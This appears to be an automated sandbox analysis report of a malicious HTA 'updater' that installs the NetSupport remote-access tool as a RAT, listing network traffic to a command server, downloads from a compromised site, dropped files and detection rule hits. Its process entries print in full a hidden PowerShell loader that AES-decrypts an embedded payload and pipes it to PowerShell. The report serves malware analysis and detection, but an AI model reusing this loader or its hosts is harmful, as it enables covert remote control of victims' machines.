                                Source: client32.exe, 00000015.00000003.387048327.0000000003C67000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.328381952.00000000011FE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.323739796.0000000003C69000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.323580294.0000000003C69000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000002.519037342.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.323719760.00000000011FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: client32.exe, 00000015.00000002.519267559.0000000011193000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: client32.exe, 00000015.00000002.518283552.0000000003C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspTelemetry-Client
                                Source: client32.exe, 00000015.00000003.387088280.00000000060F0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000002.519059336.00000000060F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspg
                                Source: client32.exe, 00000015.00000002.518283552.0000000003C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspk
                                Source: client32.exe, 00000015.00000002.518283552.0000000003C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asps
                                Source: client32.exe, 00000015.00000002.518283552.0000000003C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspz
                                Source: client32.exe, 00000015.00000002.517350632.0000000002D95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.comlocation/loca.asp
                                Source: powershell.exe, 00000002.00000002.270662092.00000000052B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.277117495.0000000006086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: powershell.exe, 00000006.00000002.272842190.000000000515D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: powershell.exe, 00000002.00000002.264547479.000000000438C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngPI
                                Source: powershell.exe, 00000002.00000002.264547479.0000000004251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.272842190.0000000005021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 00000006.00000002.272842190.000000000515D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: powershell.exe, 00000002.00000002.264547479.000000000438C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlPI
                                Source: client32.exe, 00000015.00000002.519343062.00000000111E1000.00000004.00000001.01000000.00000013.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: client32.exe, 00000015.00000002.519343062.00000000111E1000.00000004.00000001.01000000.00000013.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                Source: client32.exe, 00000015.00000002.519343062.00000000111E1000.00000004.00000001.01000000.00000013.sdmpString found in binary or memory: http://www.pci.co.uk/support
                                Source: client32.exe, 00000015.00000002.519343062.00000000111E1000.00000004.00000001.01000000.00000013.sdmpString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: powershell.exe, 00000006.00000002.277117495.0000000006086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 00000006.00000002.277117495.0000000006086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 00000006.00000002.277117495.0000000006086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: powershell.exe, 00000006.00000002.272842190.000000000515D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: powershell.exe, 00000002.00000002.264547479.000000000438C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterPI
                                Source: powershell.exe, 00000006.00000002.272842190.00000000058D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                Source: powershell.exe, 00000002.00000002.270662092.00000000052B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.277117495.0000000006086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: unknownHTTP traffic detected: POST http://5.252.178.51/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 5.252.178.51Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: unknownDNS traffic detected: queries for: duet-cdn.vox-cdn.com
                                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/01/MediaContent.zip HTTP/1.1Host: www.advisingdealers.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/01/client32.exe HTTP/1.1Host: www.advisingdealers.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: unknownHTTPS traffic detected: 162.215.249.83:443 -> 192.168.2.6:49722 version: TLS 1.2
                                Source: Yara matchFile source: 22.2.client32.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 22.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000015.00000002.519267559.0000000011193000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.325451942.0000000011193000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 8048, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\MediaContent\PCICL32.DLL, type: DROPPED

                                System Summary

                                barindex
                                Source: amsi32_7088.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: Process Memory Space: powershell.exe PID: 5372, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: Process Memory Space: powershell.exe PID: 5596, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2758
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2638
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2590
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2758Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2638Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2590Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\client32.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\msvcr100.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\pcicapi.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\bootuwf.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\memtest.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\bootvhd.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MediaContent\client32.exe (copy)Jump to dropped file
                                Source: amsi32_7088.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: Process Memory Space: powershell.exe PID: 5372, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: Process Memory Space: powershell.exe PID: 5596, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0288DAF02_2_0288DAF0
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0288C0982_2_0288C098
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0288C1232_2_0288C123
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_028845A02_2_028845A0
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0288DACD2_2_0288DACD
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_028888B02_2_028888B0
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_028888C02_2_028888C0
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02888E792_2_02888E79
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D6C4782_2_06D6C478
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0812D0286_2_0812D028
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08120BB06_2_08120BB0
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08120BAF6_2_08120BAF
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0812D1D86_2_0812D1D8
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0822F3BA6_2_0822F3BA
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0822F3BA6_2_0822F3BA
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_084276606_2_08427660
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_084276606_2_08427660
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0842D1216_2_0842D121
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0842D1306_2_0842D130
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_084200406_2_08420040
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_084200066_2_08420006
                                Source: memtest.exe.7.drStatic PE information: No import functions for PE file found
                                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeProcess token adjusted: SecurityJump to behavior
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\MediaContent\HTCTL32.DLL EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                Source: Client_version(updater).htaReversingLabs: Detection: 18%
                                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Client_version(updater).hta"
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto | powershell - }
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto | powershell -
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\MediaContent\client32.exe "C:\Users\user\AppData\Roaming\MediaContent\client32.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\MediaContent\client32.exe C:\Users\user\AppData\Roaming\MediaContent\client32.exe
